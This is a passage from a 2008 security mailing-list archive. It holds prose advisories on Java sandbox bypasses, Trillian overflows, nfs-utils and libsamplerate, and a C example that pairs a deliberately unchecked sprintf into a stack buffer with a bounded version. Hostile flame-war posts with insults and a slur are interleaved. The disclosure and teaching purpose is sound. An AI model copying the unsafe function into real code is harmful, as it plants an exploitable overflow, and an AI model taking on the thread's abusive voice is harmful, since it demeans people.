There is a potential workaround for the vulnerability, but it renders the JRE unusable. It is possible to use the cacls program to change the file permissions on fontmanager.dll. This will prevent the vulnerable library from loading. However, this workaround has a serious impact on the functionality of the JRE. When a webpage attempts to load an applet, the JRE will abort with a runtime error, and the browser will close.

VI. VENDOR RESPONSE

Sun Microsystems Inc. has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

07/31/2008 Initial Vendor Notification
08/01/2008 Initial Vendor Reply
10/21/2008 Additional Vendor Feedback
11/26/2008 Additional Vendor Feedback
12/02/2008 Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Sebastian Apelt (webmaster at buzzworld.org).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJOFsZbjs6HoxIfBkRAkAXAKCustwzLXcOKMcDJ1sZ0GonmW4F8ACg6Dva
mqtkKX2/C9fA7aiyNDRtgbA=
=Oo+F
-----END PGP SIGNATURE-----

From nb at ausics.net Thu Dec 4 22:59:18 2008
From: nb at ausics.net (Noel Butler)
Date: Fri, 05 Dec 2008 08:59:18 +1000
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>
Message-ID: <1228431557.23932.4.camel@roswell.ausics.net>

really, interesting.. how can they contribute to anyone else's benefit, since they are both fucking cockheads and are in almost everyone's shitlist filters, in fact how do we not know ghost, you are not another one of this delusional fuckheads aliases, you'd have to be, to be even making out like you even read anything those wankas post.

On Thu, 2008-12-04 at 13:23, ghost wrote:

> Hey mike, how about you stop playing moderator you fucking douche bag.
> I for one believe netdev brings a lot to this list and encourage him
> and ureleet to continue posting.
>
> On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote:
> > Hey Guys,
> >
> > I thought we had settled the issues offline. Let's restart our
> > discussions.. this bickering is highly unnecessary on the list.
> >
> > --
> > MC
> > Security Researcher
> > Lead, Project Chroma
> > http://sites.google.com/site/projectchromaproject/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/0ddcc2ff/attachment.html

From marc.deslauriers at canonical.com Thu Dec 4 22:29:05 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 04 Dec 2008 17:29:05 -0500
Subject: [Full-disclosure] [USN-687-1] nfs-utils vulnerability
Message-ID: <1228429745.352.9.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-687-1 December 04, 2008
nfs-utils vulnerability
CVE-2008-4552
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  nfs-kernel-server 1:1.0.7-3ubuntu2.1

Ubuntu 7.10:
  nfs-kernel-server 1:1.1.1~git-20070709-3ubuntu1.1

Ubuntu 8.04 LTS:
  nfs-kernel-server 1:1.1.2-2ubuntu2.2

Ubuntu 8.10:
  nfs-kernel-server 1:1.1.2-4ubuntu1.1

After a standard system upgrade you need to restart nfs services to effect the necessary changes.

Details follow:

It was discovered that nfs-utils did not properly enforce netgroup restrictions when using TCP Wrappers. Remote attackers could bypass the netgroup restrictions enabled by the administrator and possibly gain access to sensitive information.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/f19f771f/attachment.bin

From xploitable at gmail.com Thu Dec 4 23:41:01 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 4 Dec 2008 23:41:01 +0000
Subject: [Full-disclosure] Staff incompetence is real, cyber terrorism is fake
Message-ID: <4b6ee9310812041541q6be583a0qd11227de40aab2ef@mail.gmail.com>

http://lists.grok.org.uk/pipermail/full-disclosure/2008-December/066180.html

From zdi-disclosures at 3com.com Fri Dec 5 00:19:04 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 4 Dec 2008 18:19:04 -0600
Subject: [Full-disclosure] ZDI-08-081: Sun Java Web Start and Applet Multiple Sandbox Bypass Vulnerabilities
Message-ID:

ZDI-08-081: Sun Java Web Start and Applet Multiple Sandbox Bypass Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-08-081
December 4, 2008

-- Affected Vendors:
Sun Microsystems

-- Affected Products:
Sun Microsystems Java Runtime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5527, 4714. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
These vulnerabilities allow remote attackers to bypass sandbox restrictions on vulnerable installations of Sun Java Web Start. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The first vulnerability results in a cache location and a user name information disclosure. By accessing the SI_FILEDIR property of a SingleInstanceImpl class, the location of the temporary single instance files can be parsed to discover the user name and cache location.
The second vulnerability allows applets to read any file on a victim's filesystem, outside of the restricted path of the applet. The specific flaw exists in the handling of the file: protocol assigned to an applet codebase. If the codebase points to the local filesystem, any file is then readable by the malicious applet.

The third vulnerability allows JNLP files to bypass socket restrictions. By loading a secondary JNLP with an href attribute containing a wildcard. When this object is instantiated, all hosts are eligible for socket connect and accept.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More details can be found at:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1

-- Disclosure Timeline:
2008-07-14 - Vulnerability reported to vendor
2008-12-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Csepely

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com.

From zdi-disclosures at 3com.com Fri Dec 5 00:18:08 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 4 Dec 2008 18:18:08 -0600
Subject: [Full-disclosure] ZDI-08-078: Trillian IMG SRC ID Memory Corruption Vulnerability
Message-ID:

ZDI-08-078: Trillian IMG SRC ID Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-078
December 4, 2008

-- Affected Vendors:
Cerulean Studios

-- Affected Products:
Cerulean Studios Trillian

-- Vulnerability Details:
This vulnerability allows remote attackers to potentially execute arbitrary code on vulnerable installations of Cerulean Studios Trillian. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the XML processing code for Trillian. When parsing specially formulated xml, the application will corrupt an internal data structure. Whilst deallocating this data structure, the application can be tricked into freeing a single allocated chunk multiple times, which can potentially lead to code execution.
-- Vendor Response:
Trillian has issued an update to correct this vulnerability. More details can be found at:

http://blog.ceruleanstudios.com/?p=404

-- Disclosure Timeline:
2008-11-10 - Vulnerability reported to vendor
2008-12-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Damian Put

From zdi-disclosures at 3com.com Fri Dec 5 00:17:48 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 4 Dec 2008 18:17:48 -0600
Subject: [Full-disclosure] ZDI-08-077: Trillian AIM IMG Tag Parsing Stack Overflow Vulnerability
Message-ID:

ZDI-08-077: Trillian AIM IMG Tag Parsing Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-077
December 4, 2008

-- Affected Vendors:
Cerulean Studios

-- Affected Products:
Cerulean Studios Trillian

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cerulean Studios Trillian. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the tooltip processing code for Trillian. When creating a tooltip for an image, the application generates an XML tag including a property containing the filename. This data is then copied directly into a stack-based buffer without any length verifications which can eventually lead to code execution with the privileges of the client.

-- Vendor Response:
Cerulean Studios has issued an update to correct this vulnerability. More details can be found at:

http://blog.ceruleanstudios.com/?p=404

-- Disclosure Timeline:
2008-11-10 - Vulnerability reported to vendor
2008-12-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Damian Put
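
The unchecked copy described in ZDI-08-077 above, shown next to a bounded version. This is an added example: it is not part of the advisory and it is not Trillian's code. The `<tooltip image="...">` tag, the 128-byte buffer and all function names are assumptions made for illustration, and the XML escaping goes beyond what the advisory describes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TAG_MAX 128 /* assumed buffer size; the advisory does not give the real one */

/* UNSAFE, kept for contrast: the filename is formatted straight into a
 * fixed-size stack buffer, so any name longer than the space left after
 * the tag text writes past the end of tag[]. Never call this on
 * untrusted input. */
int build_tag_unchecked(const char *filename, char *out, size_t outlen)
{
    char tag[TAG_MAX];
    sprintf(tag, "<tooltip image=\"%s\"/>", filename); /* no length check */
    if (strlen(tag) >= outlen)
        return -1;
    strcpy(out, tag);
    return 0;
}

/* Append src at *pos; fail instead of truncating. Requires *pos < cap. */
static int append(char *dst, size_t cap, size_t *pos, const char *src)
{
    size_t n = strlen(src);
    if (n >= cap - *pos) /* one byte is reserved for the terminator */
        return -1;
    memcpy(dst + *pos, src, n);
    *pos += n;
    dst[*pos] = '\0';
    return 0;
}

/* Append one filename byte, escaping XML attribute metacharacters and
 * rejecting control characters. */
static int append_escaped(char *dst, size_t cap, size_t *pos, char c)
{
    char one[2] = { c, '\0' };
    if ((unsigned char)c < 0x20 || c == 0x7f)
        return -1;
    switch (c) {
    case '&':  return append(dst, cap, pos, "&amp;");
    case '<':  return append(dst, cap, pos, "&lt;");
    case '>':  return append(dst, cap, pos, "&gt;");
    case '"':  return append(dst, cap, pos, "&quot;");
    case '\'': return append(dst, cap, pos, "&apos;");
    default:   return append(dst, cap, pos, one);
    }
}

/* Hardened form: every write is bounded by outlen, and an over-long or
 * malformed name is rejected as a whole. Returns 0 on success, -1 on
 * rejection, in which case out is left as an empty string. */
int build_tag_checked(const char *filename, char *out, size_t outlen)
{
    size_t pos = 0;
    const char *p;

    if (filename == NULL || out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (append(out, outlen, &pos, "<tooltip image=\"") != 0)
        goto reject;
    for (p = filename; *p != '\0'; p++)
        if (append_escaped(out, outlen, &pos, *p) != 0)
            goto reject;
    if (append(out, outlen, &pos, "\"/>") != 0)
        goto reject;
    return 0;
reject:
    out[0] = '\0'; /* never hand back a half-built tag */
    return -1;
}

int main(void)
{
    char tag[TAG_MAX];
    char longname[4 * TAG_MAX]; /* constructed over-long input */
    int rc;

    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    rc = build_tag_checked("cat.png", tag, sizeof tag);
    printf("short name: rc=%d tag=%s\n", rc, tag);
    rc = build_tag_checked(longname, tag, sizeof tag);
    printf("long name:  rc=%d tag=\"%s\"\n", rc, tag);
    return 0;
}
```

Rejecting the whole name rather than truncating it keeps a cut-off entity or an unterminated attribute from reaching the XML consumer.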
From zdi-disclosures at 3com.com Fri Dec 5 00:18:26 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 4 Dec 2008 18:18:26 -0600
Subject: [Full-disclosure] ZDI-08-079: Trillian AIM Plugin Malformed XML Tag Heap Overflow Vulnerability
Message-ID:

ZDI-08-079: Trillian AIM Plugin Malformed XML Tag Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-079
December 4, 2008

-- Affected Vendors:
Cerulean Studios

-- Affected Products:
Cerulean Studios Trillian

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cerulean Studios Trillian. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the XML processing code for Trillian. When parsing a malformed XML tag, the application does not allocate enough space for its contents. During copying of this to the newly allocated buffer, the application will overwrite heap structures with attacker-supplied data that can then be leveraged to achieve code execution with the privileges of the application.

-- Vendor Response:
Cerulean Studios has issued an update to correct this vulnerability. More details can be found at:

http://blog.ceruleanstudios.com/?p=404

-- Disclosure Timeline:
2008-11-24 - Vulnerability reported to vendor
2008-12-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Damian Put

From zdi-disclosures at 3com.com Fri Dec 5 00:18:45 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 4 Dec 2008 18:18:45 -0600
Subject: [Full-disclosure] ZDI-08-080: Sun Java AWT Library Sandbox Violation Vulnerability
Message-ID:

ZDI-08-080: Sun Java AWT Library Sandbox Violation Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-080
December 4, 2008

-- Affected Vendors:
Sun Microsystems

-- Affected Products:
Sun Microsystems Java Runtime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6249.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sun Microsystems Java. User interaction is required in that a user must open a malicious file or visit a malicious web page.

The specific flaw occurs within the Java AWT library. If a custom image model is used for the source 'Raster' during a conversion through a 'ConvolveOp' operation, the imaging library will calculate the size of the destination raster for the conversion incorrectly, leading to a heap-based overflow. This can result in arbitrary code execution under the context of the current user.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More details can be found at:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1

-- Disclosure Timeline:
2008-04-16 - Vulnerability reported to vendor
2008-12-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

From ghosts at gmail.com Fri Dec 5 00:49:10 2008
From: ghosts at gmail.com (ghost)
Date: Thu, 4 Dec 2008 19:49:10 -0500
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: <1228431557.23932.4.camel@roswell.ausics.net>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> <1228431557.23932.4.camel@roswell.ausics.net>
Message-ID: <6f4bb0b50812041649lb0d57a3le14927b232d22ae8@mail.gmail.com>

a wanka mate? well i be a fag from down unda, cheers & jolly ho ol chap.

This is the only contribution youve made to full-disclosure. So whos the useless wanka then? go on back to your bread pudding before i take a piss on ya and give you a good rodging.

On Thu, Dec 4, 2008 at 5:59 PM, Noel Butler wrote:
> really, interesting..
how can they contribute to anyone else's benefit, > since they are both fucking cockheads and are in almost everyones shitlist > filters, infact how do we not know ghost, you are not another one of this > delusional fuckheads aliases, you'd have to be, to be even making out like > you even read anything those wankas post. > > > > On Thu, 2008-12-04 at 13:23, ghost wrote: > > Hey mike, how about you stop playing moderator you fucking douche bag. > I for one believe netdev brings alot to this list and encourage him > and ureleet to continue posting. > > On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: >> Hye Guys, >> >> I though we had settled the issues offline. Lets restart our >> discussions.. this bickering is highly unnecessary on the list. >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From security at mandriva.com Fri Dec 5 01:34:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 04 Dec 2008 18:34:00 -0700 Subject: [Full-disclosure] [ MDVSA-2008:238 ] libsamplerate Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:238 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libsamplerate Date : December 4, 2008 Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A buffer overflow was found by Russell O'Conner in the libsamplerate library versions prior to 0.1.4 that could possibly lead to the execution of arbitrary code via a specially crafted audio file (CVE-2008-5008). The updated packages have been patched to prevent this issue. 
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJOFc0mqjQ0CJFipgRAjweAKDVUt2pCqRSgKnXlJI0gJoSgbuXBACeMk6+ SxoIyNyLtbDX6XnTUTazqts= =Kbrk -----END PGP SIGNATURE----- From ureleet at gmail.com Fri Dec 5 01:30:35 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:30:35 -0500 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> Message-ID: <6158bb410812041730o2944f168ubc4b4535520ef25@mail.gmail.com> true. On Wed, Dec 3, 2008 at 10:23 PM, ghost wrote: > Hey mike, how about you stop playing moderator you fucking douche bag. > I for one believe netdev brings alot to this list and encourage him > and ureleet to continue posting. > > On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: >> Hye Guys, >> >> I though we had settled the issues offline. Lets restart our >> discussions.. this bickering is highly unnecessary on the list. >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. 
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Fri Dec 5 01:31:31 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:31:31 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <20081202192922.62A6C118041@smtp.hushmail.com> Message-ID: <6158bb410812041731l3aced389ra38603f0d118870@mail.gmail.com> u mean, again? dude, its already been done. and by ppl alot smarter than u. stfu. try sumthing knew. u obviously fucked this 1 up. On Wed, Dec 3, 2008 at 9:45 PM, Mike C wrote: > On Tue, Dec 2, 2008 at 11:29 AM, Elazar Broad wrote: >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> >> >> On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad >> wrote: >>>Mike C wrote: >>>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad >>>wrote: >>>> >>>>> and how does making a color based on these inputs protect >>>people? >>>>> >>>>> >>>> >>>> Once all desktops have an icon or widget (say at the right hand >>>> corner) with the color, and this is consistently seen >>>everywhere, the >>>> users will start associating with their online security. they >>>will be >>>> reminded that they have to be careful with the data they share. >>>> >>>> This, if implemented correctly will be a boon to security >>>industry, >>>> where the weakest kinks currently are 'n00b' users. >>>> >>>> >>>you are joking right? >>> >>>So some widget is going to stop the next SMB remote or IE client >>>side >>>and protect the 'n00b' users? Please explain how this works. Also >>>please >>>explain how "they will be reminded that they have to be careful >>>with the >>>data they share. 
" has anything to do with protecting a users >>>machine >>>from being compromised. >> >> Thats the whole point. There is a fine line between using visual >> alerts to put people(Joe six pack) into a state of "awareness"(more >> like mild hysteria) of a threat versus knowing how to protect >> oneself against that threat and using that awareness indicator as >> the kick in the ass to get moving and shore up the defenses(hell, >> how many security folk do this too, then again, every time >> something goes bump we see red). Visual alerts are great at >> persuasion tools, especially when the goal is to get Joe to buy >> your latest all-in-one-will-make-your-coffee-and-buy-you-beer >> AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the >> closet package. So of course, Joe will never learn how to properly >> defend his computer/data, and the "industry" will prosper. >> > > I dont think it is a lost battle. This method could prove an excellent > way to solve this age old problem. > >> Now, thanks to our good friends over at the DHS, the color system >> has turned into a complete and utter joke(for the most part), so my >> friend, you see, this a complete exercise in futility(besides the >> fact that every friggin AV/IDS/Security/SIM company out there has >> red, yellow and green as their corporate "flag", if you are just >> joining the party, then you can completely ignore this) >> > DHS implementation leaves a lot to be desired. Please do not compare > this to DHS's implementation. > >> If you really want to change state of security for the n00bs, >> spread the knowledge, not the colors. >> > Thats what project Chroma is all about.. Are you on board?! > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Fri Dec 5 01:32:20 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:32:20 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <4b6ee9310812041429y40f606bcq837c44e829a11948@mail.gmail.com> References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com> <4b6ee9310812041429y40f606bcq837c44e829a11948@mail.gmail.com> Message-ID: <6158bb410812041732u26c8cfebs98b98b0634304c23@mail.gmail.com> you know andrew, i couldnt have said it better. even tho i disagree and _do_ say that estonia and georgia _were_ cyber attacks, u make an excellent discussion. On Thu, Dec 4, 2008 at 5:29 PM, n3td3v wrote: > On Thu, Dec 4, 2008 at 4:36 PM, Razi Shaban wrote: >> On Thu, Dec 4, 2008 at 5:03 PM, Chris Jeane wrote: >>> The Project Chroma Project website reads(I have highlighted the colors in >>> black so that they are readable): >>> >>> Levels crap >>> >> >> On Thu, Dec 4, 2008 at 6:28 PM, Razi Shaban wrote: >>> On Thu, Dec 4, 2008 at 6:02 PM, Chris Jeane wrote: >>>> Exactly. Which is why there is a need of a system that contains more >>>> information and less cookie cutter levels. We still don't know what a >>>> cyber-war looks like. One country could attack the transport/power systems >>>> of a third party that supplies/supports their target. This is all >>>> hypothetical, but there is a high probability of collateral damage. >>>> >>> >>> You misunderstood me. What I was getting at is that your ideas, >>> including a "cyber-war" and all this leveling, show that you are about >>> as uninformed as n3td3v. Please take your nub spam somewhere else. >>> >>> -- >>> Razi Shaban >>> >> >> To explain the idea of leveling: The internet is a gigantic place. 
No >> matter when and from where you connect, it is out to get you, you >> individually. Also, large-scale cyber wars are a constant thing. I am >> aware of three very large-scale wars taking place at the moment, does >> that increase or decrease the risk any user would be taking by >> accessing the internet? Of course not. The concept of basing a >> levelling system on a few organized national or private attempts to do >> something or another is ridiculous; the Estonian attack compromised >> less than 0.0001% of all cyber attacks during that time period. >> >> The matter of the fact is, attempting to take the hugely complex and >> intricate dark side of the internet and summarize it in a color level >> is absurd. In fact, attempting to summarize it at all is ridiculous. >> Summarizing implies that you know everything about the topic. Anyone >> trying to summarize this knows nothing when he/she realizes the >> vastness of the internet. >> >> tl;dr : attempting to summarize the internet is less fruitful than >> throwing ice cubes at the sun, but it requires much lesser >> intelligence to do the first. >> > > I can't believe people are still using Estonia as an example of a > cyber attack, it was a false flag on an epic scale and so obvious to > I.T security experts. The government have got to try harder if they > want to convince the industry that cyber terrorism is a real threat. > But the fact is Estonia and Georgia just weren't convincing enough at > least for me, I don't know what others think. > > And the shutting down of a turbine and posting the video to CNN was > just a joke, there was no actual evidence of how the turbine shut > down, it could just be a man in the corner flicking a switch, there > was no evidence of someone using a computer to shut it down, we were > told it was a cyber attack doing it, but no proof or evidence was > given to prove it. 
They didn't even have a guy with a laptop standing > beside it or anything like that, really the government are clueless > with it comes to cyber security and creating a convincing false flag. > > When it comes to power stations being shut down through computerised > attack, I don't see the threat coming from cyber terrorism, what I see > the threat is more is accidental infection, like the three hospitals > in London that got shut down last month because of the MyTob worm/ > virus, the industry sit up and listen to that kind of thing and take > it seriously (or at least I did), but they shouldn't take seriously > Estonia, Georgia, DHS turbine videos. > > Cyber terrorism isn't a real threat in the climate we're in right now, > what we should fear is accidental infection like the three hospitals > in London. That got my attention more than Estonia, Georgia, DHS > turbine video put together, because it was so obvious that the three > hospitals in London was a genuine incident and not set up by the > powers of be. > > We should worry more about staff competence being the main threat, not > cyber terrorism, but mistakes made by I.T departments and accidental > infection onto networks that are sensitive like the three hospitals in > London. > > Please it just makes me cringe when I see people using Estonia as a > way to pave political policy and setting up things. There is no cyber > terrorism guys, there is staff incompetence and accidental infection > that is the biggest worry for me right now, than some people in a cave > wanting to carry out an electronic jihad. > > Money is wasted setting up cyber commands and other stuff, the money > should really be spent on making sure the private and public sector > and academia is trained to a specific standard so that the three > hospitals incident can't happen again. 
> > As for the color code thing, thats just a load of wash and bollocks > thats not needed, its good for businesses like Symantec and SANS to > have alert levels, because fear is part of what they play on to make > the money that they do. > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Fri Dec 5 01:32:56 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 4 Dec 2008 20:32:56 -0500 Subject: [Full-disclosure] Iran executes IT expert who spied for Israel In-Reply-To: References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com> <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com> Message-ID: <6158bb410812041732l5beee829r3cf2e4269d353606@mail.gmail.com> oh mike c, now i shall turn my wrath towards u for being a cock. On Wed, Dec 3, 2008 at 9:49 PM, Mike C wrote: > On Wed, Dec 3, 2008 at 6:55 AM, Ureleet wrote: >> hes not a troll andrew. he brings up good points. u nd i are the >> only trolls here. i only troll u. you troll every1. >> > > Yes, acceptance is he first stage of recovery for the both of you. Let > us continue with the offline discussions. 
